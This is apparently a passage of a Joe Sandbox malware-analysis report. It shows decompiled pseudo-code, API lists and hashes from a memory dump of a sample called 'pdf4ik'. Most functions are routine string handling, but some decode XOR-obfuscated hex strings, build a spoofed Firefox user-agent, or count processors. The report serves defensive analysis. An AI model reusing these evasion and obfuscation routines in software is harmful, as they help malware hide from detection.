								if(_t22 < 0x10) {
									_t23 = _t66;
								} else {
									_t23 =  *_t66;
								}
								E29DAE1F0(_t23 + _a4, _t51,  *((intOrPtr*)(_t66 + 0x10)));
								if( *((intOrPtr*)(_t66 + 0x14)) < 0x10) {
									_t26 = _t66;
								} else {
									_t26 =  *_t66;
								}
								E29DB0010(_t26, _t43, _a4);
								 *((intOrPtr*)(_t66 + 0x10)) = _t61;
								if( *((intOrPtr*)(_t66 + 0x14)) < 0x10) {
									 *((char*)(_t66 + _t61)) = 0;
									goto L35;
								} else {
									 *((char*)( *_t66 + _t61)) = 0;
									return _t66;
								}
							}
						}
					}
				} else {
					_t53 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t53 < 0x10) {
						_t35 = __ecx;
					} else {
						_t35 =  *__ecx;
					}
					if(_t43 < _t35) {
						goto L12;
					} else {
						if(_t53 < 0x10) {
							_t36 = _t66;
						} else {
							_t36 =  *_t66;
						}
						_t54 =  *((intOrPtr*)(_t66 + 0x10)) + _t36;
						if(_t54 <= _t43) {
							goto L12;
						} else {
							if(_t53 < 0x10) {
								return E29D89B10(_a4, _t66, _t53, _t66, _t43 - _t66);
							} else {
								return E29D89B10(_a4, _t66, _t53, _t66, _t43 -  *_t66);
							}
						}
					}
				}
			}




















                                        0x29d89c74
                                        0x29d89c77
                                        0x29d89c7b
                                        0x29d89cd2
                                        0x29d89cd2
                                        0x29d89cd5
                                        0x29d89cdf
                                        0x29d89ce6
                                        0x29d89ce6
                                        0x29d89ced
                                        0x29d89da7
                                        0x29d89dac
                                        0x29d89cf3
                                        0x29d89cf4
                                        0x29d89cfa
                                        0x29d89d01
                                        0x29d89d01
                                        0x29d89d06
                                        0x29d89d0b
                                        0x29d89d2c
                                        0x00000000
                                        0x29d89d2e
                                        0x29d89d2e
                                        0x29d89d34
                                        0x29d89d45
                                        0x29d89d48
                                        0x29d89d4d
                                        0x29d89d36
                                        0x29d89d39
                                        0x29d89d41
                                        0x29d89d41
                                        0x29d89d34
                                        0x29d89d0d
                                        0x29d89d11
                                        0x29d89d18
                                        0x29d89da6
                                        0x00000000
                                        0x29d89d1e
                                        0x29d89d1e
                                        0x29d89d1e
                                        0x29d89d24
                                        0x29d89d50
                                        0x29d89d26
                                        0x29d89d26
                                        0x29d89d26
                                        0x29d89d55
                                        0x29d89d5b
                                        0x29d89d57
                                        0x29d89d57
                                        0x29d89d57
                                        0x29d89d66
                                        0x29d89d72
                                        0x29d89d78
                                        0x29d89d74
                                        0x29d89d74
                                        0x29d89d74
                                        0x29d89d80
                                        0x29d89d8c
                                        0x29d89d8f
                                        0x29d89da2
                                        0x00000000
                                        0x29d89d91
                                        0x29d89d93
                                        0x29d89d9d
                                        0x29d89d9d
                                        0x29d89d8f
                                        0x29d89d18
                                        0x29d89d0b
                                        0x29d89c7d
                                        0x29d89c7d
                                        0x29d89c83
                                        0x29d89c89
                                        0x29d89c85
                                        0x29d89c85
                                        0x29d89c85
                                        0x29d89c8d
                                        0x00000000
                                        0x29d89c8f
                                        0x29d89c92
                                        0x29d89c98
                                        0x29d89c94
                                        0x29d89c94
                                        0x29d89c94
                                        0x29d89c9d
                                        0x29d89ca1
                                        0x00000000
                                        0x29d89ca3
                                        0x29d89ca6
                                        0x29d89ccf
                                        0x29d89ca8
                                        0x29d89cba
                                        0x29d89cba
                                        0x29d89ca6
                                        0x29d89ca1
                                        0x29d89c8d

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89CE6
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89D01
                                        • _memmove.LIBCMT ref: 29D89D66
                                        • _memmove.LIBCMT ref: 29D89D80
                                          • Part of subcall function 29D89B10: std::_Xinvalid_argument.LIBCPMT ref: 29D89B3E
                                          • Part of subcall function 29D89B10: std::_Xinvalid_argument.LIBCPMT ref: 29D89B5B
                                          • Part of subcall function 29D89B10: _memmove.LIBCMT ref: 29D89BC1
                                          • Part of subcall function 29D89B10: _memmove.LIBCMT ref: 29D89BF0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argument_memmovestd::_
                                        • String ID: Software\Micr$string too long
                                        • API String ID: 256744135-3427781227
                                        • Opcode ID: c998182545fd7416e15b2fb7178d9d99953720857ed65ef7e7cd6662a24435b9
                                        • Instruction ID: ec513d6c683afcd58fbf5302aaba1882bdd78f8118512b2596f67d2c70ec6330
                                        • Opcode Fuzzy Hash: c998182545fd7416e15b2fb7178d9d99953720857ed65ef7e7cd6662a24435b9
                                        • Instruction Fuzzy Hash: E641F6723106109BD324CE5CE8C895AF3E9FF956607104A2EE2D2CBE56C771AC93D7A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9D160 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113memorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 80%
                                        			E29D9D160(long* __ecx, CHAR* __edx, void** _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v24;
				void** _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v68;
				char _v96;
				void** _v100;
				long* _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				signed int _t29;
				intOrPtr _t32;
				char _t33;
				signed int _t35;
				void* _t38;
				void* _t43;
				int _t45;
				void* _t47;
				void* _t48;
				intOrPtr* _t49;
				void* _t55;
				long _t56;
				intOrPtr _t58;
				char _t71;
				signed int _t75;
				void* _t76;
				signed int _t77;
				CHAR* _t82;
				void* _t83;
				signed int _t85;

				_push(0xffffffff);
				_push(E29DC21B8);
				_push( *[fs:0x0]);
				_t28 =  *0x29dd5664; // 0xd9555f04
				_t29 = _t28 ^ _t85;
				_v20 = _t29;
				_push(_t29);
				 *[fs:0x0] =  &_v16;
				_t82 = __edx;
				_t71 = "0123456789ABCDEF"; // 0x33323130
				_v100 = _a4;
				_t32 = M29DCFFB8; // 0x37363534
				_v104 = __ecx;
				_t58 = M29DCFFBC; // 0x42413938
				_v40 = _t71;
				_t72 =  *0x29dcffc0; // 0x46454443
				_v36 = _t32;
				_t33 =  *0x29dcffc4; // 0x0
				_v32 = _t58;
				_v28 = _t72;
				_v24 = _t33;
				_t75 = 0;
				if(lstrlenA(__edx) <= 0) {
					L8:
					_t35 = _t75;
				} else {
					_t38 = E29DAF190( &_v40,  *_t82);
					if(_t38 != 0) {
						_t72 =  &_v40;
						_t77 = _t38 -  &_v40 << 4;
						_t43 = E29DAF190( &_v40, _t82[1]);
						if(_t43 == 0) {
							goto L2;
						} else {
							_t75 =  !(_t77 + _t43 -  &_v40 ^ 0xffffffa3) & 0x000000ff;
							_t45 = lstrlenA(_t82);
							_t72 = _v104;
							_t16 = _t45 - 1; // -1
							_t56 = _t16;
							 *_v104 = _t56;
							_t47 = HeapAlloc(GetProcessHeap(), 8, _t56);
							 *_v100 = _t47;
							if(_t47 == 0) {
								goto L2;
							} else {
								_t48 = E29D89100( &_v68, _t82);
								_v8 = 0;
								_t49 = E29D951E0(2, _t48,  &_v96, 0xffffffff);
								if( *((intOrPtr*)(_t49 + 0x14)) >= 0x10) {
									_t49 =  *_t49;
								}
								_t72 = _v100;
								E29DAE6AF( *_v100, _t56, _t49);
								E29D89160( &_v96);
								E29D89160( &_v68);
								goto L8;
							}
						}
					} else {
						L2:
						_t35 = 0;
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t76);
				_pop(_t83);
				_pop(_t55);
				return E29DADF46(_t35, _t55, _v20 ^ _t85, _t72, _t76, _t83);
			}







































                                        0x29d9d163
                                        0x29d9d165
                                        0x29d9d170
                                        0x29d9d174
                                        0x29d9d179
                                        0x29d9d17b
                                        0x29d9d181
                                        0x29d9d185
                                        0x29d9d18e
                                        0x29d9d190
                                        0x29d9d196
                                        0x29d9d199
                                        0x29d9d19e
                                        0x29d9d1a1
                                        0x29d9d1a7
                                        0x29d9d1aa
                                        0x29d9d1b0
                                        0x29d9d1b3
                                        0x29d9d1b9
                                        0x29d9d1bc
                                        0x29d9d1bf
                                        0x29d9d1c2
                                        0x29d9d1cc
                                        0x29d9d28e
                                        0x29d9d28e
                                        0x29d9d1d2
                                        0x29d9d1da
                                        0x29d9d1e4
                                        0x29d9d1ed
                                        0x29d9d1f5
                                        0x29d9d1ff
                                        0x29d9d209
                                        0x00000000
                                        0x29d9d20b
                                        0x29d9d218
                                        0x29d9d21e
                                        0x29d9d224
                                        0x29d9d227
                                        0x29d9d227
                                        0x29d9d22d
                                        0x29d9d236
                                        0x29d9d23f
                                        0x29d9d243
                                        0x00000000
                                        0x29d9d245
                                        0x29d9d249
                                        0x29d9d25a
                                        0x29d9d261
                                        0x29d9d26a
                                        0x29d9d26c
                                        0x29d9d26c
                                        0x29d9d26e
                                        0x29d9d276
                                        0x29d9d281
                                        0x29d9d289
                                        0x00000000
                                        0x29d9d289
                                        0x29d9d243
                                        0x29d9d1e6
                                        0x29d9d1e6
                                        0x29d9d1e6
                                        0x29d9d1e6
                                        0x29d9d1e4
                                        0x29d9d293
                                        0x29d9d29b
                                        0x29d9d29c
                                        0x29d9d29d
                                        0x29d9d2ab

                                        APIs
                                        • lstrlenA.KERNEL32(?,D9555F04,?,?,00000000), ref: 29D9D1C4
                                        • lstrlenA.KERNEL32(?), ref: 29D9D21E
                                        • GetProcessHeap.KERNEL32(00000008,-00000001), ref: 29D9D22F
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9D236
                                        • _strcpy_s.LIBCMT ref: 29D9D276
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heaplstrlen$AllocProcess_strcpy_s
                                        • String ID: 0123456789ABCDEF
                                        • API String ID: 3087150108-2554083253
                                        • Opcode ID: 7fb648c46144ce2e5ca405075950ed756379b280048d28a3d4bfe3c86f5118ee
                                        • Instruction ID: c7ededa59066ee3d985012c0c00aae273de1cb725be35e0a259f6063217642ce
                                        • Opcode Fuzzy Hash: 7fb648c46144ce2e5ca405075950ed756379b280048d28a3d4bfe3c86f5118ee
                                        • Instruction Fuzzy Hash: 7A41A3729042499FDB04DFA8DD44A9EB7B9EF59350F108169E815E7380EB34AA06DBB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D89A20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D89A20(void* __eax, signed int __ecx, intOrPtr* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t21;
				intOrPtr* _t24;
				char* _t29;
				void* _t33;
				signed int _t34;
				intOrPtr _t37;
				intOrPtr* _t38;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr* _t50;

				_t50 = __esi;
				_t34 = __ecx;
				_t41 = _a8;
				_t33 = __eax;
				_t3 = _a4 + 0x10; // 0x45c6ffff
				_t19 =  *_t3;
				if(_t19 < _t41) {
					_t19 = E29DAD48D("invalid string position");
				}
				_t20 = _t19 - _t41;
				if(_t20 < _t33) {
					_t33 = _t20;
				}
				_t21 =  *((intOrPtr*)(_t50 + 0x10));
				if((_t34 | 0xffffffff) - _t21 <= _t33) {
					_t21 = E29DAD440("string too long");
				}
				if(_t33 == 0) {
					L24:
					return _t50;
				} else {
					_t45 = _t21 + _t33;
					if(_t45 > 0xfffffffe) {
						_t21 = E29DAD440("string too long");
					}
					_t37 =  *((intOrPtr*)(_t50 + 0x14));
					if(_t37 >= _t45) {
						if(_t45 != 0) {
							goto L11;
						} else {
							 *((intOrPtr*)(_t50 + 0x10)) = _t45;
							if(_t37 < 0x10) {
								_t29 = _t50;
								 *_t29 = 0;
								return _t29;
							} else {
								 *((char*)( *_t50)) = 0;
								return _t50;
							}
						}
					} else {
						E29D89750(_t50, _t45, _t21);
						_t41 = _a8;
						if(_t45 == 0) {
							L23:
							goto L24;
						} else {
							L11:
							_t38 = _a4;
							if( *((intOrPtr*)(_t38 + 0x14)) >= 0x10) {
								_t38 =  *_t38;
							}
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								_t24 = _t50;
							} else {
								_t24 =  *_t50;
							}
							E29DB0010( *((intOrPtr*)(_t50 + 0x10)) + _t24, _t38 + _t41, _t33);
							 *((intOrPtr*)(_t50 + 0x10)) = _t45;
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								 *((char*)(_t50 + _t45)) = 0;
								goto L23;
							} else {
								 *((char*)( *_t50 + _t45)) = 0;
								return _t50;
							}
						}
					}
				}
			}















                                        0x29d89a20
                                        0x29d89a20
                                        0x29d89a23
                                        0x29d89a27
                                        0x29d89a2c
                                        0x29d89a2c
                                        0x29d89a31
                                        0x29d89a38
                                        0x29d89a38
                                        0x29d89a3d
                                        0x29d89a41
                                        0x29d89a43
                                        0x29d89a43
                                        0x29d89a45
                                        0x29d89a4f
                                        0x29d89a56
                                        0x29d89a56
                                        0x29d89a5d
                                        0x29d89afb
                                        0x29d89aff
                                        0x29d89a63
                                        0x29d89a64
                                        0x29d89a6a
                                        0x29d89a71
                                        0x29d89a71
                                        0x29d89a76
                                        0x29d89a7b
                                        0x29d89aa7
                                        0x00000000
                                        0x29d89aa9
                                        0x29d89aa9
                                        0x29d89aaf
                                        0x29d89abe
                                        0x29d89ac1
                                        0x29d89ac6
                                        0x29d89ab1
                                        0x29d89ab4
                                        0x29d89abb
                                        0x29d89abb
                                        0x29d89aaf
                                        0x29d89a7d
                                        0x29d89a81
                                        0x29d89a86
                                        0x29d89a8b
                                        0x29d89afa
                                        0x00000000
                                        0x29d89a8d
                                        0x29d89a8d
                                        0x29d89a8d
                                        0x29d89a98
                                        0x29d89a9a
                                        0x29d89a9a
                                        0x29d89a9f
                                        0x29d89ac9
                                        0x29d89aa1
                                        0x29d89aa1
                                        0x29d89aa1
                                        0x29d89ad5
                                        0x29d89ae1
                                        0x29d89ae4
                                        0x29d89af6
                                        0x00000000
                                        0x29d89ae6
                                        0x29d89ae8
                                        0x29d89af1
                                        0x29d89af1
                                        0x29d89ae4
                                        0x29d89a8b
                                        0x29d89a7b

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89A38
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89A56
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89A71
                                        • _memmove.LIBCMT ref: 29D89AD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                        • String ID: invalid string position$string too long
                                        • API String ID: 443534600-4289949731
                                        • Opcode ID: 7a8363e2851c447244d12e3c96e9d1da0931e5a55f4b1b7de23cf2d54d2d1530
                                        • Instruction ID: c8f9116eddba3f103ad1c5796887a6ec08d5eef99d8a993ea3b3f89822ac9b39
                                        • Opcode Fuzzy Hash: 7a8363e2851c447244d12e3c96e9d1da0931e5a55f4b1b7de23cf2d54d2d1530
                                        • Instruction Fuzzy Hash: E321D835300200AFD314CF6CD8C4A1AB7E5FF90614F204A2EE1D6ABE56D771D947A3A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA6F10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DA6F10(void* __eax, signed int __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr* _t19;
				char* _t28;
				char _t33;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr* _t40;
				signed int _t44;
				intOrPtr* _t50;
				void* _t51;

				_t50 = __edi;
				_t44 = __edx;
				_t51 = __eax;
				_t16 =  *((intOrPtr*)(__edi + 0x10));
				if(_t16 < __eax) {
					_t16 = E29DAD48D("invalid string position");
				}
				_t38 = _a4;
				if((_t44 | 0xffffffff) - _t16 <= _t38) {
					_t16 = E29DAD440("string too long");
				}
				if(_t38 == 0) {
					L23:
					return _t50;
				} else {
					_t33 = _t16 + _t38;
					if(_t33 > 0xfffffffe) {
						_t16 = E29DAD440("string too long");
					}
					_t39 =  *((intOrPtr*)(_t50 + 0x14));
					if(_t39 >= _t33) {
						if(_t33 != 0) {
							goto L9;
						} else {
							 *((intOrPtr*)(_t50 + 0x10)) = _t33;
							if(_t39 < 0x10) {
								_t28 = _t50;
								 *_t28 = 0;
								return _t28;
							} else {
								 *((char*)( *_t50)) = _t33;
								return _t50;
							}
						}
					} else {
						E29D89750(_t50, _t33, _t16);
						if(_t33 == 0) {
							L22:
							goto L23;
						} else {
							L9:
							_t18 =  *((intOrPtr*)(_t50 + 0x14));
							if(_t18 < 0x10) {
								_t40 = _t50;
							} else {
								_t40 =  *_t50;
							}
							if(_t18 < 0x10) {
								_t19 = _t50;
							} else {
								_t19 =  *_t50;
							}
							E29DAE1F0(_t19 + _t51 + _a4, _t40 + _t51,  *((intOrPtr*)(_t50 + 0x10)) - _t51);
							E29D953E0(_t50, _a4, _a8, _t51);
							 *((intOrPtr*)(_t50 + 0x10)) = _t33;
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								 *((char*)(_t50 + _t33)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t50 + _t33)) = 0;
								return _t50;
							}
						}
					}
				}
			}















                                        0x29da6f10
                                        0x29da6f10
                                        0x29da6f14
                                        0x29da6f16
                                        0x29da6f1b
                                        0x29da6f22
                                        0x29da6f22
                                        0x29da6f27
                                        0x29da6f31
                                        0x29da6f38
                                        0x29da6f38
                                        0x29da6f3f
                                        0x29da6fea
                                        0x29da6fee
                                        0x29da6f45
                                        0x29da6f46
                                        0x29da6f4c
                                        0x29da6f53
                                        0x29da6f53
                                        0x29da6f58
                                        0x29da6f5d
                                        0x29da6f7a
                                        0x00000000
                                        0x29da6f7c
                                        0x29da6f7c
                                        0x29da6f82
                                        0x29da6f90
                                        0x29da6f93
                                        0x29da6f98
                                        0x29da6f84
                                        0x29da6f86
                                        0x29da6f8d
                                        0x29da6f8d
                                        0x29da6f82
                                        0x29da6f5f
                                        0x29da6f63
                                        0x29da6f6a
                                        0x29da6fe9
                                        0x00000000
                                        0x29da6f6c
                                        0x29da6f6c
                                        0x29da6f6c
                                        0x29da6f72
                                        0x29da6f9b
                                        0x29da6f74
                                        0x29da6f74
                                        0x29da6f74
                                        0x29da6fa0
                                        0x29da6fa6
                                        0x29da6fa2
                                        0x29da6fa2
                                        0x29da6fa2
                                        0x29da6fb7
                                        0x29da6fc7
                                        0x29da6fd0
                                        0x29da6fd3
                                        0x29da6fe5
                                        0x00000000
                                        0x29da6fd5
                                        0x29da6fd7
                                        0x29da6fe0
                                        0x29da6fe0
                                        0x29da6fd3
                                        0x29da6f6a
                                        0x29da6f5d

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA6F22
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA6F38
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA6F53
                                        • _memmove.LIBCMT ref: 29DA6FB7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                        • String ID: invalid string position$string too long
                                        • API String ID: 443534600-4289949731
                                        • Opcode ID: f61d4498f6b1bc7a5c8c282a9c17cd594cf9a256cefd0c55b7b09adb5585957b
                                        • Instruction ID: 091107b159d9ac5058601c17bb855e28187520d7c04db006b90931c8d204b008
                                        • Opcode Fuzzy Hash: f61d4498f6b1bc7a5c8c282a9c17cd594cf9a256cefd0c55b7b09adb5585957b
                                        • Instruction Fuzzy Hash: D9210536310101ABC3049F6DDCC0E69BB96BFA1161B94461EF555CBF81CB70E876E3A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3C40 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 91COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E29DA3C40(intOrPtr __ecx) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				signed int _t26;
				char* _t33;
				void* _t34;
				void* _t37;
				void* _t46;
				void* _t60;
				intOrPtr _t62;
				void* _t63;
				signed int _t64;
				void* _t65;
				void* _t66;
				void* _t67;

				_push(0xffffffff);
				_push(E29DC2489);
				_push( *[fs:0x0]);
				_t66 = _t65 - 0x2c;
				_t25 =  *0x29dd5664; // 0xd9555f04
				_t26 = _t25 ^ _t64;
				_v20 = _t26;
				_push(_t26);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				_t62 = __ecx;
				_v56 = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				_v60 = __ecx;
				 *((char*)(__ecx)) = 0;
				E29D892C0(__ecx, 0x29dcd617, 0);
				_v8 = 0;
				_v56 = 1;
				E29D892C0(__ecx, "Mozilla/5.0 (Windows NT 10.0; ", 0x1e);
				_push( &_v52);
				_v52 = 0;
				_push(GetCurrentProcess());
				if( *0x29dd8540() == 0) {
					L2:
					_t33 = "x86";
				} else {
					_t33 = "x64";
					if(_v52 == 0) {
						goto L2;
					}
				}
				_t34 = E29D95460( &_v48, _t62, _t33);
				_t67 = _t66 + 0xc;
				_v8 = 1;
				E29D891D0(_t34, _t62);
				_v8 = 0;
				if(_v28 >= 0x10) {
					_t55 = _v48;
					_push(_v48);
					E29DADF3B();
					_t67 = _t67 + 4;
				}
				_t37 = E29D95460( &_v48, _t62, " rv:107.0) Gecko / 20100101 Firefox / 107.0");
				_v8 = 2;
				E29D891D0(_t37, _t62);
				if(_v28 >= 0x10) {
					_push(_v48);
					E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				_pop(_t60);
				_pop(_t63);
				_pop(_t46);
				return E29DADF46(_t62, _t46, _v20 ^ _t64, _t55, _t60, _t63);
			}



























                                        0x29da3c43
                                        0x29da3c45
                                        0x29da3c50
                                        0x29da3c51
                                        0x29da3c54
                                        0x29da3c59
                                        0x29da3c5b
                                        0x29da3c61
                                        0x29da3c65
                                        0x29da3c6d
                                        0x29da3c70
                                        0x29da3c72
                                        0x29da3c76
                                        0x29da3c7d
                                        0x29da3c85
                                        0x29da3c88
                                        0x29da3c8a
                                        0x29da3c91
                                        0x29da3ca0
                                        0x29da3ca3
                                        0x29da3cab
                                        0x29da3cac
                                        0x29da3cb5
                                        0x29da3cbe
                                        0x29da3cca
                                        0x29da3cca
                                        0x29da3cc0
                                        0x29da3cc0
                                        0x29da3cc8
                                        0x00000000
                                        0x00000000
                                        0x29da3cc8
                                        0x29da3cd5
                                        0x29da3cda
                                        0x29da3cdd
                                        0x29da3ce2
                                        0x29da3ce7
                                        0x29da3cf2
                                        0x29da3cf4
                                        0x29da3cf7
                                        0x29da3cf8
                                        0x29da3cfd
                                        0x29da3cfd
                                        0x29da3d0a
                                        0x29da3d14
                                        0x29da3d1b
                                        0x29da3d23
                                        0x29da3d28
                                        0x29da3d29
                                        0x29da3d2e
                                        0x29da3d36
                                        0x29da3d3e
                                        0x29da3d3f
                                        0x29da3d40
                                        0x29da3d4e

                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000002,Mozilla/5.0 (Windows NT 10.0; ,0000001E,29DCD617,00000000,D9555F04,00000010,?,00000002,?,?,?,?,?,?,00000000), ref: 29DA3CAF
                                        • IsWow64Process.KERNEL32(00000000,?,?,?,?,?,?,00000000,29DC2489,000000FF,?,29D91E6F), ref: 29DA3CB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentWow64
                                        • String ID: rv:107.0) Gecko / 20100101 Firefox / 107.0$Mozilla/5.0 (Windows NT 10.0; $x64$x86
                                        • API String ID: 1905925150-3528451930
                                        • Opcode ID: 6ac3dd8a27e037068810ef043c3c189e81771526d2c4756c9b839d456938144a
                                        • Instruction ID: 039fe2ebcd6de606b2bb2736261b648d1b8a206e74d777e5250659795aea7694
                                        • Opcode Fuzzy Hash: 6ac3dd8a27e037068810ef043c3c189e81771526d2c4756c9b839d456938144a
                                        • Instruction Fuzzy Hash: 5C3184B2D11248BBCB10EFA4D884A9EB7B9FF54710F50853EE505A3640D7349A06E7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA2F50 Relevance: 10.6, APIs: 7, Instructions: 76COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E29DA2F50() {
				char _v8;
				intOrPtr* _v12;
				void* __edi;
				void* __esi;
				char* _t11;
				intOrPtr _t14;
				intOrPtr* _t18;
				void* _t20;
				intOrPtr* _t21;
				char _t24;
				intOrPtr _t25;
				intOrPtr* _t26;
				void* _t27;

				_t11 =  &_v8;
				_t26 = 0;
				_v8 = 0;
				_t20 = 0;
				_v12 = 0;
				_t25 = 0;
				__imp__GetLogicalProcessorInformationEx(0xffff, 0, _t11);
				if(_t11 != 0) {
					L7:
					_t24 = _v8;
					_t21 = _t26;
					if(_t24 != 0) {
						do {
							_t21 = _t21 + _t25;
							if( *_t21 == 0) {
								_v12 = _v12 + 1;
							}
							_t14 =  *((intOrPtr*)(_t21 + 4));
							_t20 = _t20 + _t14;
							_t25 = _t14;
						} while (_t20 < _t24);
					}
					E29DADFA6(_t26);
					return _v12;
				} else {
					while(GetLastError() == 0x7a) {
						if(_t26 != 0) {
							E29DADFA6(_t26);
							_t27 = _t27 + 4;
						}
						_t18 = E29DADFE0(_t23, _t25, _t26, _v8);
						_t26 = _t18;
						_t27 = _t27 + 4;
						if(_t26 == 0) {
							L14:
							return 0;
						} else {
							_t23 =  &_v8;
							__imp__GetLogicalProcessorInformationEx(0xffff, _t26,  &_v8);
							if(_t18 == 0) {
								continue;
							} else {
								goto L7;
							}
						}
						goto L15;
					}
					if(_t26 != 0) {
						E29DADFA6(_t26);
					}
					goto L14;
				}
				L15:
			}
















                                        0x29da2f59
                                        0x29da2f5c
                                        0x29da2f65
                                        0x29da2f68
                                        0x29da2f6a
                                        0x29da2f6d
                                        0x29da2f6f
                                        0x29da2f77
                                        0x29da2fbe
                                        0x29da2fbe
                                        0x29da2fc1
                                        0x29da2fc5
                                        0x29da2fc7
                                        0x29da2fc7
                                        0x29da2fcc
                                        0x29da2fce
                                        0x29da2fce
                                        0x29da2fd1
                                        0x29da2fd4
                                        0x29da2fd6
                                        0x29da2fd8
                                        0x29da2fc7
                                        0x29da2fdd
                                        0x29da2fee
                                        0x29da2f80
                                        0x29da2f80
                                        0x29da2f8d
                                        0x29da2f90
                                        0x29da2f95
                                        0x29da2f95
                                        0x29da2f9c
                                        0x29da2fa1
                                        0x29da2fa3
                                        0x29da2fa8
                                        0x29da2ffe
                                        0x29da3004
                                        0x29da2faa
                                        0x29da2faa
                                        0x29da2fb4
                                        0x29da2fbc
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29da2fbc
                                        0x00000000
                                        0x29da2fa8
                                        0x29da2ff1
                                        0x29da2ff4
                                        0x29da2ff9
                                        0x00000000
                                        0x29da2ff1
                                        0x00000000

                                        APIs
                                        • GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,29D93478,00000010,?,00000000,?,29D93478), ref: 29DA2F6F
                                        • GetLastError.KERNEL32(?,29D93478), ref: 29DA2F80
                                        • _free.LIBCMT ref: 29DA2F90
                                          • Part of subcall function 29DADFA6: HeapFree.KERNEL32(00000000,00000000,?,29DB523C,00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DADFBC
                                          • Part of subcall function 29DADFA6: GetLastError.KERNEL32(00000000,?,29DB523C,00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DADFCE
